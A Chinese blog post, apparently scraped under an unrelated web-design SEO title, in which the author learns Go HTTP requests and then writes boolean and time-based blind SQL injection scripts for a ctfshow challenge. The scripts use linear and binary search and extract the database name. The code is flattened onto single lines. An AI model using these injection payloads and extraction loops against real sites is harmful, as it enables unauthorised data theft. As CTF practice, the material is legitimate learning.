当前位置：首页 > news >正文

免费网站建设阿里云郑州网站建设公司

news 2025/8/13 17:30:29

免费网站建设阿里云,郑州网站建设公司,提供做网站,php模拟登陆wordpress之间学习了go的语法这里就开始go的爬虫与其说是爬虫其实就是网站的访问如何实现因为之前想通过go写sql注入盲注脚本发现不是那么简单这里开始研究一下首先是请求网站这里貌似很简单 package mainimport ("fmt""net/http" )func main() {res, …

之间学习了go的语法这里就开始go的爬虫

与其说是爬虫其实就是网站的访问如何实现因为之前想通过go写sql注入盲注脚本

发现不是那么简单这里开始研究一下

首先是请求网站

这里貌似很简单

package mainimport ("fmt""net/http"
)func main() {res, err := http.Get("https://www.baidu.com/")fmt.Println(res, err)
}

&{200 OK 200 HTTP/1.1 1 1 map[Content-Type:[application/x-gzip] Date:[Thu, 14 Dec 2023 06:31:16 GMT] Server:[bfe]] 0xc0001a0020 -1 [] false true map[] 0xc000136000 0xc000118370} <nil>发现这里是一个地址

然后就是读取源代码

package mainimport ("fmt""io""net/http""os"
)func main() {res, err := http.Get("https://www.baidu.com/")if err != nil {fmt.Println("connnect error")os.Exit(0)}body, err := io.ReadAll(res.Body)// fmt.Println(body)fmt.Println(string(body))
}

这里再难一点

package mainimport ("fmt""io""net/http""os"
)func main() {var url string = "http://www.baidu.com/"download(url)}
func download(url string) {client := &http.Client{} //这里是将 client作为http.clinet的结构体4res, _ := http.NewRequest("GET", url, nil)res.Header.Set("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)") //设置handerresp, err := client.Do(res)if err != nil {fmt.Println("connect error")os.Exit(0)}defer resp.Body.Close() //取消链接 这里入栈 即 最后进行取消links, err := io.ReadAll(resp.Body)fmt.Println(string(links))
}

通过函数然后发送请求

package mainimport ("fmt""io""net/http""os""strings"
)func main() {var url string = "http://www.baidu.com/"download(url)}
func download(url string) {client := &http.Client{} //这里是将 client作为http.clinet的结构体4res, _ := http.NewRequest("GET", url, nil)res.Header.Set("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)") //设置handerresp, err := client.Do(res)if err != nil {fmt.Println("connect error")os.Exit(0)}defer resp.Body.Close() //取消链接 这里入栈 即 最后进行取消links, err := io.ReadAll(resp.Body)// fmt.Println(string(links))if strings.Contains(string(links), "百度一下") {fmt.Println("存在")} else {fmt.Println("不存在")}
}

然后这里开始尝试写一下盲注脚本

这里开始是bool脚本题目是ctfshow 174

golang bool注入普通脚本

package mainimport ("fmt""io""net/http""net/url""os""strings"
)var payload string = "1' and (ascii(substr((select database()),%v,1))=%v)-- +"
var flag stringfunc main() {var url string = "http://0b85a32b-ecd2-47f2-8883-22c57d54f0b2.challenge.ctf.show/api/v4.php?id="sqlin(url)
}
func sqlin(url1 string) {for i := 1; i < 200; i++ {for j := 0; j < 127; j++ {if j >= 50 {payload1 := fmt.Sprintf(payload, i, j)// fmt.Println(payload1)payload2 := url.QueryEscape(payload1)payload1 = url1 + payload2// fmt.Println(payload1)re := send(payload1)if check(re) {flag += string(j)fmt.Println(flag)}}}}
}func send(url string) string {client := &http.Client{}res, _ := http.NewRequest("GET", url, nil)res.Header.Set("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)")resq, err := client.Do(res)if err != nil {fmt.Println("connect error")os.Exit(0)}defer resq.Body.Close()rest, err := io.ReadAll(resq.Body)res1 := string(rest)return res1
}func check(test string) bool {if strings.Contains(test, "admin") {return true} else {return false}
}

很慢哦

二分法看看如何实现

golang bool注入二分法脚本

package mainimport ("fmt""io""net/http""net/url""os""strings"
)var payload string = "1' and (ascii(substr((select database()),%v,1))>%v)-- +"
var flag stringfunc main() {var url string = "http://0b85a32b-ecd2-47f2-8883-22c57d54f0b2.challenge.ctf.show/api/v4.php?id="sqlin(url)
}
func sqlin(url1 string) {for i := 1; i < 200; i++ {high := 127low := 37mid := (high + low) / 2// fmt.Println(mid)for high > low {payload1 := fmt.Sprintf(payload, i, mid)// fmt.Println(payload1)payload2 := url.QueryEscape(payload1)payload1 = url1 + payload2// fmt.Println(payload1)re := send(payload1)if check(re) {low = mid + 1} else {high = mid}// fmt.Println(low, high)mid = (high + low) / 2if string(mid) == "%" {os.Exit(0)}}flag += string(mid)fmt.Println(flag)}
}func send(url string) string {client := &http.Client{}res, _ := http.NewRequest("GET", url, nil)res.Header.Set("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)")resq, err := client.Do(res)if err != nil {fmt.Println("connect error")os.Exit(0)}defer resq.Body.Close()rest, err := io.ReadAll(resq.Body)res1 := string(rest)return res1
}func check(test string) bool {if strings.Contains(test, "admin") {return true} else {return false}
}

能发现其实其他都是差不多的只是修改了

if check(re) {low = mid + 1} else {high = mid}// fmt.Println(low, high)mid = (high + low) / 2if string(mid) == "%" {os.Exit(0)}

这一块速度又起来了

下面想尝试一下时间注入

golang time注入二分法脚本

package mainimport ("fmt""io""net/http""net/url""os""time"
)var payload string = "1' and if((ascii(substr((select database()),%v,1))>%v),sleep(5),0)-- +"
var flag stringfunc main() {var url string = "http://0b85a32b-ecd2-47f2-8883-22c57d54f0b2.challenge.ctf.show/api/v4.php?id="sqlin(url)
}
func sqlin(url1 string) {for i := 1; i < 200; i++ {high := 127low := 37mid := (high + low) / 2// fmt.Println(mid)for high > low {payload1 := fmt.Sprintf(payload, i, mid)fmt.Println(payload1)payload2 := url.QueryEscape(payload1)payload1 = url1 + payload2// fmt.Println(payload1)_, int123 := send(payload1)if check(int123) {low = mid + 1} else {high = mid}// fmt.Println(low, high)mid = (high + low) / 2if string(mid) == "%" {os.Exit(0)}}flag += string(mid)fmt.Println(flag)}
}func send(url string) (string, int64) {client := &http.Client{}res, _ := http.NewRequest("GET", url, nil)res.Header.Set("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)")start := time.Now()resq, err := client.Do(res)if err != nil {fmt.Println("connect error")os.Exit(0)}defer resq.Body.Close()elapsed := time.Since(start).Milliseconds()rest, err := io.ReadAll(resq.Body)res1 := string(rest)return res1, elapsed
}func check(test int64) bool {if test > 5000 {return true} else {return false}
}

这里是sql注入time的二分法但是我想进行优化